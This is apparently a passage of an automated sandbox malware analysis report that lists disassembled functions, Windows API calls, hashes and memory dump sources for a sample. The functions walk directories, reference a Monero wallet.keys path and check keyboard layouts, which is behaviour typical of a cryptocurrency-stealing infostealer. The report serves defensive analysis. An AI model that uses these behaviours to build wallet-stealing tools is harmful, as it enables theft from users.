                                  • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                  • String ID: \*.*
                                  • API String ID: 1415058207-1173974218
                                  • Opcode ID: 3f88ec8b84c1b41c3f1a826849db7b254f92b04848ac64f14c18528a87282693
                                  • Instruction ID: 4fd1dd11605abd8b23c4c3da2a872923c44b13f3d5b173b248f5c404faadf844
                                  • Opcode Fuzzy Hash: 3f88ec8b84c1b41c3f1a826849db7b254f92b04848ac64f14c18528a87282693
                                  • Instruction Fuzzy Hash: 381226719101189BDB55FB60CC96EEE7378AF94300F41819AB11E62091EF386F99EF93
                                  Function 00F6DE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00F7A740: lstrcpy.KERNEL32(00F80E17,00000000), ref: 00F7A788
                                    • Part of subcall function 00F7A9B0: lstrlen.KERNEL32(?,016F8A70,?,\Monero\wallet.keys,00F80E17), ref: 00F7A9C5
                                    • Part of subcall function 00F7A9B0: lstrcpy.KERNEL32(00000000), ref: 00F7AA04
                                    • Part of subcall function 00F7A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00F7AA12
                                    • Part of subcall function 00F7A8A0: lstrcpy.KERNEL32(?,00F80E17), ref: 00F7A905
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00F80C2E), ref: 00F6DE5E
                                  • StrCmpCA.SHLWAPI(?,00F814C8), ref: 00F6DEAE
                                  • StrCmpCA.SHLWAPI(?,00F814CC), ref: 00F6DEC4
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00F6E3E0
                                  • FindClose.KERNEL32(000000FF), ref: 00F6E3F2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                  • String ID: \*.*
                                  • API String ID: 2325840235-1173974218
                                  • Opcode ID: 715ded1d342ce3bf4e02d3913506f67f0e2ad20782700c87304d69321e60a52b
                                  • Instruction ID: 36835ae1ab89345eea27483e37308c00cf266fbd0089076bd5966d701e7867ab
                                  • Opcode Fuzzy Hash: 715ded1d342ce3bf4e02d3913506f67f0e2ad20782700c87304d69321e60a52b
                                  • Instruction Fuzzy Hash: EBF1A0718141189ADB29FB60DC95EEE7338BF54300F8181EAA51E62091EF346F9ADF53
                                  Function 00F6DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00F7A740: lstrcpy.KERNEL32(00F80E17,00000000), ref: 00F7A788
                                    • Part of subcall function 00F7A920: lstrcpy.KERNEL32(00000000,?), ref: 00F7A972
                                    • Part of subcall function 00F7A920: lstrcat.KERNEL32(00000000), ref: 00F7A982
                                    • Part of subcall function 00F7A9B0: lstrlen.KERNEL32(?,016F8A70,?,\Monero\wallet.keys,00F80E17), ref: 00F7A9C5
                                    • Part of subcall function 00F7A9B0: lstrcpy.KERNEL32(00000000), ref: 00F7AA04
                                    • Part of subcall function 00F7A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00F7AA12
                                    • Part of subcall function 00F7A8A0: lstrcpy.KERNEL32(?,00F80E17), ref: 00F7A905
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00F814B0,00F80C2A), ref: 00F6DAEB
                                  • StrCmpCA.SHLWAPI(?,00F814B4), ref: 00F6DB33
                                  • StrCmpCA.SHLWAPI(?,00F814B8), ref: 00F6DB49
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00F6DDCC
                                  • FindClose.KERNEL32(000000FF), ref: 00F6DDDE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID:
                                  • API String ID: 3334442632-0
                                  • Opcode ID: 1b66330b0cbc17c64d31619ff25769a709d822f3ba5d099cc2fe3b3bff47529d
                                  • Instruction ID: 6eb62701f55e46bf85ff9cadec920bf12ac5916baf8dffc8eaa03248280041ec
                                  • Opcode Fuzzy Hash: 1b66330b0cbc17c64d31619ff25769a709d822f3ba5d099cc2fe3b3bff47529d
                                  • Instruction Fuzzy Hash: 2B916372A0010897CB14FBB0EC56DEE773CAFC4300F418669B81A97185EE389B59DB93
                                  Function 01331970 Relevance: 12.8, Strings: 9, Instructions: 1537COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: !$T$1<$?\g$SxY$V9su$nRZi$t+_~$xK_x$@,~
                                  • API String ID: 0-586295527
                                  • Opcode ID: 8c321852ec7e9673240f13510f21cfaed3bff94e56a7626170724f9a63fb8136
                                  • Instruction ID: e8f466e42e3e3304ed4eab503651369eae2c2c7b2bdc857539c89b3141e4bae9
                                  • Opcode Fuzzy Hash: 8c321852ec7e9673240f13510f21cfaed3bff94e56a7626170724f9a63fb8136
                                  • Instruction Fuzzy Hash: 00B2E5F360C204AFE304AF29EC8567ABBE9EF94720F16892DE6C4C7744E63558418797
                                  Function 00F77B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00F7A740: lstrcpy.KERNEL32(00F80E17,00000000), ref: 00F7A788
                                  • GetKeyboardLayoutList.USER32(00000000,00000000,00F805AF), ref: 00F77BE1
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00F77BF9
                                  • GetKeyboardLayoutList.USER32(?,00000000), ref: 00F77C0D
                                  • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00F77C62
                                  • LocalFree.KERNEL32(00000000), ref: 00F77D22
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                  • String ID: /
                                  • API String ID: 3090951853-4001269591
                                  • Opcode ID: 2336e7008c13f54c0bec525e8bbe41474039583c61133ff4c372b51d6febafe2
                                  • Instruction ID: b0ea47014b98e89237e00b1c224373373d44473e7e8286bc83270c37e9366ef0
                                  • Opcode Fuzzy Hash: 2336e7008c13f54c0bec525e8bbe41474039583c61133ff4c372b51d6febafe2
                                  • Instruction Fuzzy Hash: 3E416E71950218ABCB24EB94DC89FEEB774FF48700F60819AE10962181DB342F85DFA2
                                  Function 01336B9E Relevance: 10.2, Strings: 7, Instructions: 1452COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: +Z:w$-|0S$:?$P3W5$Py_$]@[w$v}
                                  • API String ID: 0-4275929979
                                  • Opcode ID: 9635e437166bdc00673070fa75b8db2579a0b5918680c28320267a09ec334bb0
                                  • Instruction ID: c7a18be1ee87ffffcc1cda8a97a829bd673ab44201f9bb559937ce8288bad08d
                                  • Opcode Fuzzy Hash: 9635e437166bdc00673070fa75b8db2579a0b5918680c28320267a09ec334bb0
                                  • Instruction Fuzzy Hash: 90A2D5F3608204AFD3046E2DEC8567AFBEAEFD4720F1A492DE6C4C3744E63598458697
                                  Function 00F6E430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00F7A740: lstrcpy.KERNEL32(00F80E17,00000000), ref: 00F7A788
                                    • Part of subcall function 00F7A920: lstrcpy.KERNEL32(00000000,?), ref: 00F7A972
                                    • Part of subcall function 00F7A920: lstrcat.KERNEL32(00000000), ref: 00F7A982
                                    • Part of subcall function 00F7A9B0: lstrlen.KERNEL32(?,016F8A70,?,\Monero\wallet.keys,00F80E17), ref: 00F7A9C5
                                    • Part of subcall function 00F7A9B0: lstrcpy.KERNEL32(00000000), ref: 00F7AA04
                                    • Part of subcall function 00F7A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00F7AA12
                                    • Part of subcall function 00F7A8A0: lstrcpy.KERNEL32(?,00F80E17), ref: 00F7A905
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00F80D73), ref: 00F6E4A2
                                  • StrCmpCA.SHLWAPI(?,00F814F8), ref: 00F6E4F2
                                  • StrCmpCA.SHLWAPI(?,00F814FC), ref: 00F6E508
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00F6EBDF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                  • String ID: \*.*
                                  • API String ID: 433455689-1173974218
                                  • Opcode ID: ec8f9b1fdd379a1430a25c9e075b555077f708a4d463050ef822041e37d466c1
                                  • Instruction ID: eae6f6f41e2b2eaf2e21f9c93e4cb994d198c0029a5940569e9febf64220d284
                                  • Opcode Fuzzy Hash: ec8f9b1fdd379a1430a25c9e075b555077f708a4d463050ef822041e37d466c1
                                  • Instruction Fuzzy Hash: FE1246729101189ADB18FB70DC96EEE7338AF94300F4181AAB51E96091EF385F59DF93
                                  Function 0133D505 Relevance: 9.1, Strings: 6, Instructions: 1637COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 9W_$_-}v$d_;$m-8}$m/$$}
                                  • API String ID: 0-2263078821
                                  • Opcode ID: 5d2b4a4f1dc2027072e7d04ef0146df73f9c4bed647759bc0c226b7aecf3a989
                                  • Instruction ID: ceb97d0f22450c883621fa87455045ad0f96880f4b9afcaa9792f72c2c891deb
                                  • Opcode Fuzzy Hash: 5d2b4a4f1dc2027072e7d04ef0146df73f9c4bed647759bc0c226b7aecf3a989
                                  • Instruction Fuzzy Hash: C0B226F350C2049FE304AE29EC8567ABBE5EF94720F1A893DEAC4C7744E63598058797
                                  Function 01334DD2 Relevance: 7.9, Strings: 5, Instructions: 1697COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: U{$Z&t$^o~$`C;{$xb;
                                  • API String ID: 0-4025509837
                                  • Opcode ID: 7cd347e1a83a74c54f541fa5de7062a539167ba5ed970f0827bcdbadb54e468e
                                  • Instruction ID: 66945da1f36508907110de4a559ec20e5711df1b6590d3e81b230c98328ec2eb
                                  • Opcode Fuzzy Hash: 7cd347e1a83a74c54f541fa5de7062a539167ba5ed970f0827bcdbadb54e468e
                                  • Instruction Fuzzy Hash: 1DB218F360C2009FE3046E2DEC8567ABBE9EFD4720F1A893DE6C5C7744EA3558418696
                                  Function 0132FDD7 Relevance: 7.9, Strings: 5, Instructions: 1623COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: =)oK$A.Ky$E`M-$d-!$z0/
                                  • API String ID: 0-3894838556
                                  • Opcode ID: dda6d5a72d335ae911eab0ea27ef2de1bb6c758e73bcb8e5b499378ff3ae91bf
                                  • Instruction ID: 234cc3115e12b2e5a7aed77b55ff47f5b115726f36b7daaf6fa61dc7c8ed93d4
                                  • Opcode Fuzzy Hash: dda6d5a72d335ae911eab0ea27ef2de1bb6c758e73bcb8e5b499378ff3ae91bf
                                  • Instruction Fuzzy Hash: 6CB227F3A0C2049FE304AF2DEC8567ABBE9EF94720F16493DEAC5C7744E63558018696
                                  Function 00F6C820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00F6C871
                                  • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00F6C87C
                                  • lstrcat.KERNEL32(?,00F80B46), ref: 00F6C943
                                  • lstrcat.KERNEL32(?,00F80B47), ref: 00F6C957
                                  • lstrcat.KERNEL32(?,00F80B4E), ref: 00F6C978
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$BinaryCryptStringlstrlen
                                  • String ID:
                                  • API String ID: 189259977-0
                                  • Opcode ID: 84a317b99d7677ef83d73526f86dedf6bf18fe624b97e6d1bd399e3299bf239e
                                  • Instruction ID: 95233fa6afaf30f7f19d69fb90ca8d7f326cd652a6ec9e9cb9871ad2c57ca449
